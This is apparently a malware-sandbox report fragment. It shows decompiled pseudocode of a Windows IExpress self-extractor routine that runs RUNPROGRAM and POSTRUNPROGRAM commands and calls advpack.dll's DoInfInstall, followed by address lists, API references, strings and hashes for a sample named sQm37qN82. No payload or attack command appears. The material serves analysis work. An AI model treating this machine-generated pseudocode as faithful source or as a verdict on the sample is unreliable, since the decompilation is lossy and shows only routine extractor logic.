                                                                                                                                                                                                        										__eflags = _t149;
                                                                                                                                                                                                        										if(_t149 != 0) {
                                                                                                                                                                                                        											L37:
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												L57:
                                                                                                                                                                                                        												_t151 = _v408;
                                                                                                                                                                                                        												_t146 =  &_v352;
                                                                                                                                                                                                        												_t130 = _t151; // executed
                                                                                                                                                                                                        												_t79 = E00DE3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                        												__eflags = _t79;
                                                                                                                                                                                                        												if(_t79 == 0) {
                                                                                                                                                                                                        													L61:
                                                                                                                                                                                                        													LocalFree(_t151);
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												L58:
                                                                                                                                                                                                        												LocalFree(_t151);
                                                                                                                                                                                                        												_t127 = _t127 + 1;
                                                                                                                                                                                                        												_v396 = _t127;
                                                                                                                                                                                                        												__eflags = _t127 - 2;
                                                                                                                                                                                                        												if(_t127 >= 2) {
                                                                                                                                                                                                        													_t155 = 1;
                                                                                                                                                                                                        													__eflags = 1;
                                                                                                                                                                                                        													L69:
                                                                                                                                                                                                        													__eflags =  *0xde8580;
                                                                                                                                                                                                        													if( *0xde8580 != 0) {
                                                                                                                                                                                                        														E00DE2267();
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													_t77 = _t155;
                                                                                                                                                                                                        													goto L63;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t153 = _v392;
                                                                                                                                                                                                        												_t149 = _v388;
                                                                                                                                                                                                        												continue;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											L38:
                                                                                                                                                                                                        											__eflags =  *0xde8180;
                                                                                                                                                                                                        											if( *0xde8180 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c7;
                                                                                                                                                                                                        												E00DE44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                        												LocalFree(_v424);
                                                                                                                                                                                                        												 *0xde9124 = 0x8007042b;
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t157;
                                                                                                                                                                                                        											if(_t157 == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xde9a34 & 0x00000004;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												goto L57;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t129 = E00DE6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                        											__eflags = _t129;
                                                                                                                                                                                                        											if(_t129 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c8;
                                                                                                                                                                                                        												E00DE44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                        												L65:
                                                                                                                                                                                                        												LocalFree(_v408);
                                                                                                                                                                                                        												 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        												goto L62;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                        											_v404 = _t146;
                                                                                                                                                                                                        											__eflags = _t146;
                                                                                                                                                                                                        											if(_t146 == 0) {
                                                                                                                                                                                                        												_t146 = 0x4c9;
                                                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                                                        												E00DE44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                        												FreeLibrary(_t129);
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xde8a30;
                                                                                                                                                                                                        											_t151 = _v408;
                                                                                                                                                                                                        											_v384 = 0;
                                                                                                                                                                                                        											_v368 =  &_v280;
                                                                                                                                                                                                        											_t96 =  *0xde9a40; // 0x3
                                                                                                                                                                                                        											_v364 = _t96;
                                                                                                                                                                                                        											_t97 =  *0xde8a38 & 0x0000ffff;
                                                                                                                                                                                                        											_v380 = 0xde9154;
                                                                                                                                                                                                        											_v376 = _t151;
                                                                                                                                                                                                        											_v372 = 0xde91e4;
                                                                                                                                                                                                        											_v360 = _t97;
                                                                                                                                                                                                        											if( *0xde8a30 != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t144 =  *0xde9a34; // 0x1
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t145 =  *0xde8d48; // 0x0
                                                                                                                                                                                                        											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                        												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                        												__eflags = _t97;
                                                                                                                                                                                                        												_v360 = _t97;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t145;
                                                                                                                                                                                                        											if(_t145 < 0) {
                                                                                                                                                                                                        												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                        												__eflags = _t104;
                                                                                                                                                                                                        												_v360 = _t104;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t98 =  *0xde9a38; // 0x0
                                                                                                                                                                                                        											_v356 = _t98;
                                                                                                                                                                                                        											_t130 = _t146;
                                                                                                                                                                                                        											 *0xdea288( &_v384);
                                                                                                                                                                                                        											_t101 = _v404();
                                                                                                                                                                                                        											__eflags = _t164 - _t164;
                                                                                                                                                                                                        											if(_t164 != _t164) {
                                                                                                                                                                                                        												_t130 = 4;
                                                                                                                                                                                                        												asm("int 0x29");
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											 *0xde9124 = _t101;
                                                                                                                                                                                                        											_push(_t129);
                                                                                                                                                                                                        											__eflags = _t101;
                                                                                                                                                                                                        											if(_t101 < 0) {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												goto L61;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												FreeLibrary();
                                                                                                                                                                                                        												_t127 = _v400;
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xde9a40 - 1; // 0x3
                                                                                                                                                                                                        										if(__eflags == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags =  *0xde8a20;
                                                                                                                                                                                                        										if( *0xde8a20 == 0) {
                                                                                                                                                                                                        											goto L37;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t157;
                                                                                                                                                                                                        										if(_t157 != 0) {
                                                                                                                                                                                                        											goto L38;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        										E00DE202A(_t146); // executed
                                                                                                                                                                                                        										goto L37;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v280;
                                                                                                                                                                                                        									_t108 = E00DE468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                        									__eflags = _t108;
                                                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xde8c42;
                                                                                                                                                                                                        									if( *0xde8c42 != 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                        									__eflags = _t112 == 0;
                                                                                                                                                                                                        									if(_t112 == 0) {
                                                                                                                                                                                                        										goto L69;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L31;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t118 =  *0xde8a38; // 0x0
                                                                                                                                                                                                        								if(_t118 == 0) {
                                                                                                                                                                                                        									L23:
                                                                                                                                                                                                        									if(_t153 != 0) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00DE468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                        										goto L27;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                        									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "USRQCMD";
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									_t146 =  &_v276;
                                                                                                                                                                                                        									if(E00DE468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                        										_t153 = 1;
                                                                                                                                                                                                        										_v388 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L23;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = "ADMQCMD";
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L26:
                                                                                                                                                                                                        						_push(_t130);
                                                                                                                                                                                                        						_t146 = 0x104;
                                                                                                                                                                                                        						E00DE1781( &_v276, 0x104, _t130, 0xde8c42);
                                                                                                                                                                                                        						goto L27;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t130 = "REBOOT";
                                                                                                                                                                                                        				_t125 = E00DE468F(_t130, 0xde9a2c, 4);
                                                                                                                                                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                        					goto L25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























































                                                                                                                                                                                                        0x00de3baa
                                                                                                                                                                                                        0x00de3bb0
                                                                                                                                                                                                        0x00de3bb7
                                                                                                                                                                                                        0x00de3bc0
                                                                                                                                                                                                        0x00de3bc2
                                                                                                                                                                                                        0x00de3bc9
                                                                                                                                                                                                        0x00de3bcb
                                                                                                                                                                                                        0x00de3bcf
                                                                                                                                                                                                        0x00de3bd3
                                                                                                                                                                                                        0x00de3bd9
                                                                                                                                                                                                        0x00de3bfd
                                                                                                                                                                                                        0x00de3bfd
                                                                                                                                                                                                        0x00de3bff
                                                                                                                                                                                                        0x00de3c03
                                                                                                                                                                                                        0x00de3c03
                                                                                                                                                                                                        0x00de3c11
                                                                                                                                                                                                        0x00de3c16
                                                                                                                                                                                                        0x00de3c19
                                                                                                                                                                                                        0x00de3c28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c30
                                                                                                                                                                                                        0x00de3c39
                                                                                                                                                                                                        0x00de3c40
                                                                                                                                                                                                        0x00de3d13
                                                                                                                                                                                                        0x00de3d15
                                                                                                                                                                                                        0x00de3d21
                                                                                                                                                                                                        0x00de3d26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c4f
                                                                                                                                                                                                        0x00de3c56
                                                                                                                                                                                                        0x00de3c60
                                                                                                                                                                                                        0x00de3c65
                                                                                                                                                                                                        0x00de3c77
                                                                                                                                                                                                        0x00de3c78
                                                                                                                                                                                                        0x00de3c7c
                                                                                                                                                                                                        0x00de3c7e
                                                                                                                                                                                                        0x00de3c82
                                                                                                                                                                                                        0x00de3c82
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c7c
                                                                                                                                                                                                        0x00de3c67
                                                                                                                                                                                                        0x00de3c69
                                                                                                                                                                                                        0x00de3c6d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c58
                                                                                                                                                                                                        0x00de3c58
                                                                                                                                                                                                        0x00de3c6e
                                                                                                                                                                                                        0x00de3c6e
                                                                                                                                                                                                        0x00de3c87
                                                                                                                                                                                                        0x00de3c89
                                                                                                                                                                                                        0x00de3d4d
                                                                                                                                                                                                        0x00de3d4f
                                                                                                                                                                                                        0x00de3d50
                                                                                                                                                                                                        0x00de3d52
                                                                                                                                                                                                        0x00de3d9e
                                                                                                                                                                                                        0x00de3da8
                                                                                                                                                                                                        0x00de3daf
                                                                                                                                                                                                        0x00de3db4
                                                                                                                                                                                                        0x00de3db6
                                                                                                                                                                                                        0x00de3f4d
                                                                                                                                                                                                        0x00de3f4d
                                                                                                                                                                                                        0x00de3f4f
                                                                                                                                                                                                        0x00de3f56
                                                                                                                                                                                                        0x00de3f57
                                                                                                                                                                                                        0x00de3f58
                                                                                                                                                                                                        0x00de3f63
                                                                                                                                                                                                        0x00de3f63
                                                                                                                                                                                                        0x00de3dbc
                                                                                                                                                                                                        0x00de3dc0
                                                                                                                                                                                                        0x00de3dc2
                                                                                                                                                                                                        0x00de3de6
                                                                                                                                                                                                        0x00de3de6
                                                                                                                                                                                                        0x00de3de8
                                                                                                                                                                                                        0x00de3f0b
                                                                                                                                                                                                        0x00de3f0b
                                                                                                                                                                                                        0x00de3f0f
                                                                                                                                                                                                        0x00de3f13
                                                                                                                                                                                                        0x00de3f15
                                                                                                                                                                                                        0x00de3f1a
                                                                                                                                                                                                        0x00de3f1c
                                                                                                                                                                                                        0x00de3f46
                                                                                                                                                                                                        0x00de3f47
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f47
                                                                                                                                                                                                        0x00de3f1e
                                                                                                                                                                                                        0x00de3f1f
                                                                                                                                                                                                        0x00de3f25
                                                                                                                                                                                                        0x00de3f26
                                                                                                                                                                                                        0x00de3f2a
                                                                                                                                                                                                        0x00de3f2d
                                                                                                                                                                                                        0x00de3fd9
                                                                                                                                                                                                        0x00de3fd9
                                                                                                                                                                                                        0x00de3fda
                                                                                                                                                                                                        0x00de3fda
                                                                                                                                                                                                        0x00de3fe1
                                                                                                                                                                                                        0x00de3fe3
                                                                                                                                                                                                        0x00de3fe3
                                                                                                                                                                                                        0x00de3fe8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3fe8
                                                                                                                                                                                                        0x00de3f33
                                                                                                                                                                                                        0x00de3f37
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f37
                                                                                                                                                                                                        0x00de3dee
                                                                                                                                                                                                        0x00de3dee
                                                                                                                                                                                                        0x00de3df5
                                                                                                                                                                                                        0x00de3fad
                                                                                                                                                                                                        0x00de3fb9
                                                                                                                                                                                                        0x00de3fc2
                                                                                                                                                                                                        0x00de3fc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3fc8
                                                                                                                                                                                                        0x00de3dfb
                                                                                                                                                                                                        0x00de3dfd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3e03
                                                                                                                                                                                                        0x00de3e0a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3e15
                                                                                                                                                                                                        0x00de3e17
                                                                                                                                                                                                        0x00de3e19
                                                                                                                                                                                                        0x00de3f94
                                                                                                                                                                                                        0x00de3fa4
                                                                                                                                                                                                        0x00de3f7c
                                                                                                                                                                                                        0x00de3f80
                                                                                                                                                                                                        0x00de3f8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f8b
                                                                                                                                                                                                        0x00de3e2c
                                                                                                                                                                                                        0x00de3e30
                                                                                                                                                                                                        0x00de3e34
                                                                                                                                                                                                        0x00de3e36
                                                                                                                                                                                                        0x00de3f69
                                                                                                                                                                                                        0x00de3f6e
                                                                                                                                                                                                        0x00de3f70
                                                                                                                                                                                                        0x00de3f76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f76
                                                                                                                                                                                                        0x00de3e3c
                                                                                                                                                                                                        0x00de3e43
                                                                                                                                                                                                        0x00de3e47
                                                                                                                                                                                                        0x00de3e52
                                                                                                                                                                                                        0x00de3e56
                                                                                                                                                                                                        0x00de3e5c
                                                                                                                                                                                                        0x00de3e61
                                                                                                                                                                                                        0x00de3e68
                                                                                                                                                                                                        0x00de3e70
                                                                                                                                                                                                        0x00de3e74
                                                                                                                                                                                                        0x00de3e7c
                                                                                                                                                                                                        0x00de3e80
                                                                                                                                                                                                        0x00de3e82
                                                                                                                                                                                                        0x00de3e82
                                                                                                                                                                                                        0x00de3e87
                                                                                                                                                                                                        0x00de3e87
                                                                                                                                                                                                        0x00de3e8b
                                                                                                                                                                                                        0x00de3e91
                                                                                                                                                                                                        0x00de3e94
                                                                                                                                                                                                        0x00de3e96
                                                                                                                                                                                                        0x00de3e96
                                                                                                                                                                                                        0x00de3e9b
                                                                                                                                                                                                        0x00de3e9b
                                                                                                                                                                                                        0x00de3e9f
                                                                                                                                                                                                        0x00de3ea2
                                                                                                                                                                                                        0x00de3ea4
                                                                                                                                                                                                        0x00de3ea4
                                                                                                                                                                                                        0x00de3ea9
                                                                                                                                                                                                        0x00de3ea9
                                                                                                                                                                                                        0x00de3ead
                                                                                                                                                                                                        0x00de3eb3
                                                                                                                                                                                                        0x00de3eb6
                                                                                                                                                                                                        0x00de3eb8
                                                                                                                                                                                                        0x00de3eb8
                                                                                                                                                                                                        0x00de3ebd
                                                                                                                                                                                                        0x00de3ebd
                                                                                                                                                                                                        0x00de3ec1
                                                                                                                                                                                                        0x00de3ec3
                                                                                                                                                                                                        0x00de3ec5
                                                                                                                                                                                                        0x00de3ec5
                                                                                                                                                                                                        0x00de3eca
                                                                                                                                                                                                        0x00de3eca
                                                                                                                                                                                                        0x00de3ece
                                                                                                                                                                                                        0x00de3ed5
                                                                                                                                                                                                        0x00de3ed9
                                                                                                                                                                                                        0x00de3ee0
                                                                                                                                                                                                        0x00de3ee6
                                                                                                                                                                                                        0x00de3eea
                                                                                                                                                                                                        0x00de3eec
                                                                                                                                                                                                        0x00de3eee
                                                                                                                                                                                                        0x00de3ef3
                                                                                                                                                                                                        0x00de3ef3
                                                                                                                                                                                                        0x00de3ef5
                                                                                                                                                                                                        0x00de3efa
                                                                                                                                                                                                        0x00de3efb
                                                                                                                                                                                                        0x00de3efd
                                                                                                                                                                                                        0x00de3f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3eff
                                                                                                                                                                                                        0x00de3eff
                                                                                                                                                                                                        0x00de3f05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3f05
                                                                                                                                                                                                        0x00de3efd
                                                                                                                                                                                                        0x00de3dc7
                                                                                                                                                                                                        0x00de3dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3dd0
                                                                                                                                                                                                        0x00de3dd7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3dd9
                                                                                                                                                                                                        0x00de3ddb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3ddd
                                                                                                                                                                                                        0x00de3de1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3de1
                                                                                                                                                                                                        0x00de3d59
                                                                                                                                                                                                        0x00de3d65
                                                                                                                                                                                                        0x00de3d6a
                                                                                                                                                                                                        0x00de3d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3d6e
                                                                                                                                                                                                        0x00de3d75
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3d8f
                                                                                                                                                                                                        0x00de3d96
                                                                                                                                                                                                        0x00de3d98
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3d98
                                                                                                                                                                                                        0x00de3c8f
                                                                                                                                                                                                        0x00de3c98
                                                                                                                                                                                                        0x00de3cf1
                                                                                                                                                                                                        0x00de3cf3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3cfe
                                                                                                                                                                                                        0x00de3d11
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3d11
                                                                                                                                                                                                        0x00de3c9c
                                                                                                                                                                                                        0x00de3ca5
                                                                                                                                                                                                        0x00de3ca7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3cad
                                                                                                                                                                                                        0x00de3cb2
                                                                                                                                                                                                        0x00de3cb7
                                                                                                                                                                                                        0x00de3cc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3ce8
                                                                                                                                                                                                        0x00de3cec
                                                                                                                                                                                                        0x00de3ced
                                                                                                                                                                                                        0x00de3ced
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3ce8
                                                                                                                                                                                                        0x00de3c9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3c9e
                                                                                                                                                                                                        0x00de3c56
                                                                                                                                                                                                        0x00de3d35
                                                                                                                                                                                                        0x00de3d35
                                                                                                                                                                                                        0x00de3d3c
                                                                                                                                                                                                        0x00de3d48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3d48
                                                                                                                                                                                                        0x00de3c03
                                                                                                                                                                                                        0x00de3be2
                                                                                                                                                                                                        0x00de3be7
                                                                                                                                                                                                        0x00de3bee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE3C11
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00DE3CDC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00DE8C42), ref: 00DE3D8F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00DE3E26
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00DE8C42), ref: 00DE3EFF
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00DE8C42), ref: 00DE3F1F
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00DE8C42), ref: 00DE3F40
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00DE8C42), ref: 00DE3F47
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00DE8C42), ref: 00DE3F76
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00DE8C42), ref: 00DE3F80
                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00DE8C42), ref: 00DE3FC2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-1894669795
                                                                                                                                                                                                        • Opcode ID: f5fb54f58b40c798f2dca97a2ea7558805f8fdc94ccc84d50dfe097ca0a1d322
                                                                                                                                                                                                        • Instruction ID: 8bdce6b880f53b3f042c8cea33503f2203b52d0ce9748f86f63450aad66bb912
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5fb54f58b40c798f2dca97a2ea7558805f8fdc94ccc84d50dfe097ca0a1d322
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6B1A070A043C19BD720BF268C89B7AB6E4EF84750F14092DFA89DB290DB74C944CB76
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
